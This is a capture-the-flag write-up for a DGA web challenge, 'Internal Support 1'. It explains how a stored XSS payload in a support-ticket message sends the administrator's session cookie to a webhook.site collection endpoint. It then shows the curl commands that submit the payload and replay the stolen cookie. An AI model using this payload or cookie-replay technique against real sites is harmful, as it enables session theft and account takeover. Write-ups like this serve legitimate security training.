Writeup DGA - CTF - Internal Support 1

This article describes my solution for the 100-point challenge called “Internal Support 1”.

Introduction

L'application "Internal Support" permet à la DGA d'assurer le support auprès de ses agents. En tant que nouvel embauché, vous pouvez vous y inscrire dès à présent.
Chaque demande de support est maintenant traitée par nos administrateurs en un temps record.

Avec une posture d’attaquant, votre but est de parvenir à vous connecter en tant qu'administrateur.
Malheureusement pour vous, le mot de passe est bien trop robuste, vous devez trouver un autre moyen.

Start

We have at our disposal a ticket management platform. It is necessary to be registered and logged in to submit one. It is possible to choose the type of ticket but this does not affect the response that is given. By the way, the answers given are automatic and generally have no link with the question asked.

However, there is one crucial piece of information: the tickets are processed by the administrators and the objective of the challenge is to log in as an administrator. Authentication on websites is very generally done through session cookies. If we manage to steal the administrator’s cookie and if the security measures are weak, we can log in as administrator.

Cross-Site Scripting (XSS)

An XSS vulnerability allows to inject content into a page, causing actions on the web browsers visiting the page.

Cookies are accessible in JavaScript via document.cookie, this means that if we manage to execute malicious code on the administrator’s page, we will be able to retrieve his authentication cookie.

To develop our attack, we will use the webhook.site tool that allows us to inspect an HTTP request made on the provided endpoint. Here is the endpoint that provided me this tool during my attack.

https://webhook.site/8d1556b1-49f1-4ba0-b934-0e7785789807

In order to retrieve a HTTP request with all the necessary elements to create a ticket (including our own session cookie) I created a ticket on the platform and retrieved the request in cURL format in the network tab of my web browser (development tools).

By analyzing the HTTP request, we can see that the content of the ticket is sent via the message attribute via the POST method (--data-raw with cURL). So our payload must be inserted in this attribute.

Here is the payload used.

<script>document.write('<img src="https://webhook.site/8d1556b1-49f1-4ba0-b934-0e7785789807?cookie='+document.cookie+'"/>')</script>

As you can see, I added document.cookie as a value for the query string cookie. As soon as a query is executed on the provided endpoint, the cookie will be automatically embedded.

The payload must be URL-encoded to avoid character interpretation problems.

Here’s what I get.

%3Cscript%3Edocument.write%28%27%3Cimg%20src%3D%22https%3A%2F%2Fwebhook.site%2F8d1556b1-49f1-4ba0-b934-0e7785789807%3Fcookie%3D%27%2Bdocument.cookie%2B%27%22%2F%3E%27%29%3C%2Fscript%3E

We can now build our malicious URL. You’ll notice that I don’t use the -L flag of cURL so that I don’t follow the redirection and thus avoid sending my cookie to the tool and having only the administrator’s one.

curl 'http://internalsupport12.chall.malicecyber.com/#i-need-help' -H 'Cookie: session=.eJwlTstqwzAQ_BWhcyherbTS5it6L8FI2lVs6sbFck4h_15BT8M8mJmXnduW-6LdXr9e1pwD7I_2nu9qL_Zz09zVbPvdrA9z7ibXOkxzLms3vyPzYW_v22WUHNoXez2Ppw62ir3aBOQDo2MuLE5bDEUgh1REI5dCLYhiw8hYyCfiVNUVQnARgSskr45kkjJp9LFpSyij0UH20ZWKCi1wwJxkmDhVxzL2GlBsLjopOO7Pz67H_xsetPajzef-rY8hxIwNJDCAQqZSRUWzCEWqEOqUKkVPgZx9_wEE0VZc.X7ru_w.INiRGHa1V773dKuW5jkvXEWnTq4' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'csrf_token=IjdhM2YxZDU5MTFlMWE2YmNkZWRlYWRkNjc2YzE1YzA4YzY3NDY1NjIi.X7ru_w.b1Q2xnL9YCLIRFjrHmgJqci2TZc&title=test&category=password_reset&message=%3Cscript%3Edocument.write%28%27%3Cimg%20src%3D%22https%3A%2F%2Fwebhook.site%2F8d1556b1-49f1-4ba0-b934-0e7785789807%3Fcookie%3D%27%2Bdocument.cookie%2B%27%22%2F%3E%27%29%3C%2Fscript%3E'

Here’s the answer we got.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to target URL: <a href="/ticket/13/">/ticket/13/</a>.  If not click the link.

A few seconds later, we receive a notification about the HTTP request capture tool. The administrator’s cookie is well embedded with the request.

We can now forge a GET HTTP request on the home page with the administrator’s cookie by modifying the value of session attribute inside the Cookie header.

curl 'http://internalsupport12.chall.malicecyber.com/' -H 'Cookie: session=.eJwljk1qAzEMha9ivA7FGsuynVN0X0KQZSkJTTNlPFmF3L2Grh7vh8f38me787jq8Mevl3f7FP-jY_BF_cF_3pWHuvt6cbeH21fHIrN0-_U23O_cfPjT-3SYJ5uOqz_u21Onu3V_9FVSbA1r6kCQWZcMVjhzpBwEMSBBNQrGNZfUE2C2Tka9kGTFHDhEVLO0lKVIaYl7JqtkwKagVGNVYwxLSti5cs4IkclSSy1Q62nin59Dt38amFbGZud9_dbHDARjAallkklovbPBIq1pROQiixiBMkjw7z_-SFck.X7rwJw.gKFptnh4Gn48UYXLdGmU9p30pHk'

By executing this request we see the following HTML element appear.

<p class="text">
	- Hide the flag &#34;NoUserValidationIsADangerousPractice&#34; a little bit better
</p>

It is also possible to modify our cookie in our browser (via the Storage tab into the developer tools) and access the administrator view.

We have just finished this challenge, the validation flag is: NoUserValidationIsADangerousPractice.